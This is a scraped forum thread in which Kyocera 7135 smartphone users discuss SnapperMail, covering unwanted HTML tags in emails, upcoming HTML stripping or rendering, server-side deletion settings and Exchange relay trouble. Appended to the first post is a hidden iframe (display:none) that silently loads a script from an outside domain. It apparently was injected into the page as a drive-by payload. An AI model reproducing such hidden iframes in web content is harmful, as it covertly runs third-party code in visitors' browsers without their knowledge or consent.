+ Reply to Thread
Results 1 to 15 of 15
  1. #1
    Registered User Kevinw's Avatar
    Join Date
    10-22-2001
    Posts
    206

    Snappermail and HTML

    I like Snappermail a lot for the 7135 but it seems almost 90 percent of the email I get these days is HTML and the HTML tags are driving me crazy. Sometimes I have to go through 3 screens worth to get to something that I can read.

    Is there must be something in the Eudora browser that filters all those thing out or am I not remembering.

    Is there a way to filter all that crap out in Snappermail I'm missing?

    Or do I just have to live with this until someone (including Snappermail) figures out HTML email?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    HTML support is something that SnapperMail should support in the near future (according to things I've read on their Yahoo group, and from e-mail responses I've gotten back from Will Lau). That's something I'm really looking forward to also.
    Please visit my picture site: Robert-O-Rama :)

  3. #3
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    I could be totally wrong about this, but...

    Go into Snappermail.
    Open up an email that you have received.
    See the three little boxes in the upper-right-hand corner of the screen?
    Tap on each of those to see the different viewing/display options.
    Doesn't this clear up the problem you described?
    ~'kito
    pdaPhoneHome Moderator

  4. #4
    Registered User
    Join Date
    07-31-2002
    Posts
    228
    As noted in the Yahoo group on snappermail, this will be offered in the very next version of snappermail. Since it's been more than a couple weeks since the last version, my guess is that the beta (for registered users) should be out soon. Snappermail is great, but I agree it will be much improved with HTML stripping.

  5. #5
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Markito
    I could be totally wrong about this, but...

    Go into Snappermail.
    Open up an email that you have received.
    See the three little boxes in the upper-right-hand corner of the screen?
    Tap on each of those to see the different viewing/display options.
    Doesn't this clear up the problem you described?
    Nope! That just lets you view additional header information

    It will be great to have html support... I just hope we can choose which browser is used!
    Please visit my picture site: Robert-O-Rama :)

  6. #6
    Registered User zucchero's Avatar
    Join Date
    03-16-2003
    Location
    New Joisey
    Posts
    653
    Originally posted by pdadoc
    As noted in the Yahoo group on snappermail, this will be offered in the very next version of snappermail. Since it's been more than a couple weeks since the last version, my guess is that the beta (for registered users) should be out soon. Snappermail is great, but I agree it will be much improved with HTML stripping.
    But will it be stripping or rendering. Will Lau seems to be hedging this one. For many moons, the talk was stripping, but the conversation swayed toward rendering. I am not sure where it stands as of right now.

    SM 1.7 should be out my month's end. I can't wait. For folks who are not familiar with this program, it is the best email program going. Support large emails, attachments, etc. In the near future, it suppose to do conduits to your PC mail. We'll see...

    --John

  7. #7
    Registered User
    Join Date
    07-31-2002
    Posts
    228
    True- i've seen that discussion.... Frankly, while some minor rendering would be great (eg, bold, underline, italics), I'm also in the camp of mainly just wanting to get rid of all those html tags. Whatever way they go, it will be a solid step forward...

  8. #8
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by zucchero
    SM 1.7 should be out my month's end. I can't wait. For folks who are not familiar with this program, it is the best email program going. Support large emails, attachments, etc. In the near future, it suppose to do conduits to your PC mail. We'll see...
    I agree... I think that SnapperMail is one of the "must have" apps for a smartphone, and particularly the 7135 (because the SD slot).

    What I am primarily looking for with HTML support is the ability to tap on embedded URL's and launch a browser to open the site. The impression I got in my response from Will Lau regarding this was that the plan was to add that functionality... but that was 6-8 weeks ago.
    Please visit my picture site: Robert-O-Rama :)

  9. #9
    Registered User
    Join Date
    09-15-2002
    Posts
    109
    Originally posted by Robert K.
    I agree... I think that SnapperMail is one of the "must have" apps for a smartphone, and particularly the 7135
    Will SnapperMail allow me to delete from my server, or at least not download headers for email I've already viewed? I can't seem to get Mobile Mail to actually delete or stop resending me old mail. Any thoughts or suggestions?

  10. #10
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by The Larch
    Will SnapperMail allow me to delete from my server, or at least not download headers for email I've already viewed? I can't seem to get Mobile Mail to actually delete or stop resending me old mail. Any thoughts or suggestions?
    SnapperMail will allow you to delete e-mail from the server (in a variety of different ways!). It can't tell what you have already viewed on your desktop computer (unless it has also been downloaded by Snapper)... the conduits feature for Outlook is supposed to be coming in a future release though. My current system is to have my work computer delete e-mail from the server after 1 day, and when emptied from the deleted items folder. At the end of my day at work I empty deleted items, and starting at 6:30 p.m. SnapperMail does periodic fetches every 15 minutes until 11:55 p.m. (on the weekends I set it to start at 7:30 a.m.). I also have SnapperMail set to only retrieve the first 20 lines of the e-mail (which speeds up downloading significantly), and if I want to see the entire e-mail I just flag that particular e-mail to be fully retrieved next time it checks.
    Please visit my picture site: Robert-O-Rama :)

  11. #11
    Registered User Kevinw's Avatar
    Join Date
    10-22-2001
    Posts
    206
    Originally posted by Markito
    I could be totally wrong about this, but...

    Go into Snappermail.
    Open up an email that you have received.
    See the three little boxes in the upper-right-hand corner of the screen?
    Tap on each of those to see the different viewing/display options.
    Doesn't this clear up the problem you described?
    Thanks Mark, but no, I already tried it, it just eliminates some of the header, stuff, etc. but there is still an abundance of html tags.

  12. #12
    Registered User Kevinw's Avatar
    Join Date
    10-22-2001
    Posts
    206
    Originally posted by Robert K.
    SnapperMail will allow you to delete e-mail from the server (in a variety of different ways!). It can't tell what you have already viewed on your desktop computer (unless it has also been downloaded by Snapper)... the conduits feature for Outlook is supposed to be coming in a future release though. My current system is to have my work computer delete e-mail from the server after 1 day, and when emptied from the deleted items folder. At the end of my day at work I empty deleted items, and starting at 6:30 p.m. SnapperMail does periodic fetches every 15 minutes until 11:55 p.m. (on the weekends I set it to start at 7:30 a.m.). I also have SnapperMail set to only retrieve the first 20 lines of the e-mail (which speeds up downloading significantly), and if I want to see the entire e-mail I just flag that particular e-mail to be fully retrieved next time it checks.
    Robert

    So can I assume what Eurdora does is "strip" right? I like Snappermail alot to, I wish they'd hurry this final change though.

  13. #13
    Registered User
    Join Date
    07-24-2001
    Posts
    31
    I liked SnapperMail too, however, it does not allow me to send from my 7135 through the Microsoft Exchange server (relay). In other words, SnapperMail won't allow me to reply to a message with my work e-mail as the return address.

    Verizon is supposed to bundle a new or updated email program with the 7135 "soon" that will allow users to do the above.

    Malcolm

  14. #14
    Registered User
    Join Date
    04-16-2003
    Posts
    10

    snappermail - NO

    I sure hope they release HTML/or Strip ability SOON! It's just about unusable as it stands with the email I get. I spend more time searching for the email than reading it.

    Is there another email program that will do Timed email fetches and strips the html?

  15. #15
    Registered User
    Join Date
    06-15-2001
    Posts
    20
    I had the 'Relay' problem with Snappermail and Exchange too.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts